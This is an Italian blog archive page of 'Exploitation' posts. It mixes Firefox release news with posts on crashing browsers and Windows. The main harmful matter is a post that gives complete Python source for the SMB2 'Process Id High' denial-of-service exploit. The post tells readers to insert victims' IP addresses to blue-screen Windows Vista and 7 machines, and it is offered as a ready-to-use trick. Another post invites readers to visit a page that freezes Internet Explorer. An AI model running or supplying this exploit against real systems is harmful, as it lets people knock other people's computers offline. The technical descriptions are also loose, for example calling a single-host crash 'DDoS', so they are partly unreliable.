Archivi 'Exploitation' Categoria
Bug DDoS su Internet Explorer
L’8/11/09 è stata scoperto un nuovo bug su alcune versioni del browser by Microsoft: Internet Explorer.
Esso è afflitto da una vulnerabilità “Denial of Service” (DDoS) trovata da MustLive che ha prontamente informato la Microsoft.
Le versioni vulnerabili a questo tipo di attacco sono:
Internet Explorer 6 (6.0.2900.2180),, Internet Explorer 7 (7.0.6000.16711),, versioni precedenti (e possibili prossime versioni).
L’exploit consiste nel bloccare il browser visitando uan pagina apposita senza permettere la sua chiusura se non terminando il processo col TaskManager.
Potete testarlo a questo link.
P.S. NON E’ DANNOSO,, VI ANDRA’ SOLO IN TILT INTERNET EXPLORER
Tags: bug, bug su IE, DDoS, Denial of Service, exploit, internet explorer buggato, MustLive, vulnerabilità DDoAS su internet explorer
Mozilla Firefox 3.5.5
Dopo un breve periodo dalla release 3.5.4 arriva la versione 3.5.5 del best browser di casa Mozilla.
Vi elenco le principali innovazioni:
Barra degli indirizzi intelligente
migliorata Trova i tuoi siti preferiti in pochi secondi (e senza bisogno di ricordare indirizzi impossibili).
Segnalibri in un clic
Aggiungi ai segnalibri, cerca e organizza i siti web in modo veloce e semplice.
Super velocità
novità Visualizza le pagine web molto più velocemente e occupando meno memoria.
Facilità di personalizzazione
migliorata Migliaia di componenti aggiuntivi ti permettono di avere un browser su misura.
Navigazione anonima
novità Naviga sul web senza lasciare alcuna traccia.
Antiphishing e antimalware
migliorata Rilassati grazie alla più avanzata protezione disponibile contro i truffatori online.
Schede
migliorata Migliora la tua produttività riorganizzando le schede con un solo gesto del mouse.
Gestione delle password
Memorizza le password per i siti senza bisogno di alcuna finestra pop-up.
Ripristino della sessione
migliorata Uno spegnimento improvviso? Riparti esattamente da dove ti eri fermato.
Identificazione immediata del sito web
Proteggiti dai tentativi di contraffazione, transazioni non sicure e truffe verificando l’identità del sito che stai visitando.
Mi raccomando aggiornate il vostro Firefox! E se non lo avete,, scaricatelo da qui.
Tags: download firefox 3.5.5, download gratis, Downloads Zone, firefox, mozilla, Mozilla Firefox 3.5.5, nuova release firefox, rilasciato firefox 3.5.5, scarica firefox 3.5.5
Mozilla Firefox 3.5.4
Rilasciata la versione 3.5.4 del famoso browser di casa Mozilla.
Riporto gli aggiornamenti e le novità di questa release direttamente dal sito ufficiale:
Risolti diversi problemi di sicurezza.
Corretti diversi problemi legati alla stabilità dell’applicazione.
Aggiunta la possibilità di reinviare le segnalazioni relative ai crash
Risolto un problema per cui, dopo aver utilizzato la funzione “Cancella cronologia recente…”, per visualizzare tutte le immagini e gli stili in alcuni siti con connessione sicura (SSL) era necessario ricaricare la pagina
Se non avete già Firefox potete trovarlo al seguente link:
Scarica Firefox 3.5.4
Tags: download firefox 3.5.4, download gratis, Downloads Zone, firefox, mozilla, Mozilla Firefox 3.5.4, nuova release firefox, rilasciato firefox 3.5.4, scarica firefox 3.5.4
Crashare Windows Vista e Windows 7
Il source code in python che posto riesce a far crashare Windows Vista,, Seven… Personalmente non ho testato comunque eccolo qui 
Sostituire l’IP_ADDR con gli indirizzi IP delle vittime. BSOD sarà qualsiasi finestra di Windows 7.
#! /Python26/Lib
# When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = “IP_ADDR”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –> 
normal value should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″
)
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.send(buff)
s.close()
Tags: crash widnows 7, crash windows seven, crash windows vista, crashare windows 7, crashare windows seven, crashare windows vista, microsoft, Programmazione, programming, python, Window$, windows 7, windows seven, windows vista
Crash Mozilla Firefox 3.0.4
Con un piccolo sorgente in JavaScript è possibile far crashare il famoso browser Firefox di casa Mozilla,, versione: 3.0.4
Source Code “Crash Firefox 3.0.4″
copiate esso e salvatelo in estensione .html,, poi uppate il file su un vostro spazio web e provate.
Share & Enjoy
Tags: bug, crash, crash firefox, crash firefox 3.0.4, crashare firefox, crashare firefox 3.0.4, firefox, Hacking, javascript, mozilla, Mozilla Firefox 3.0.4, Programmazione, programming
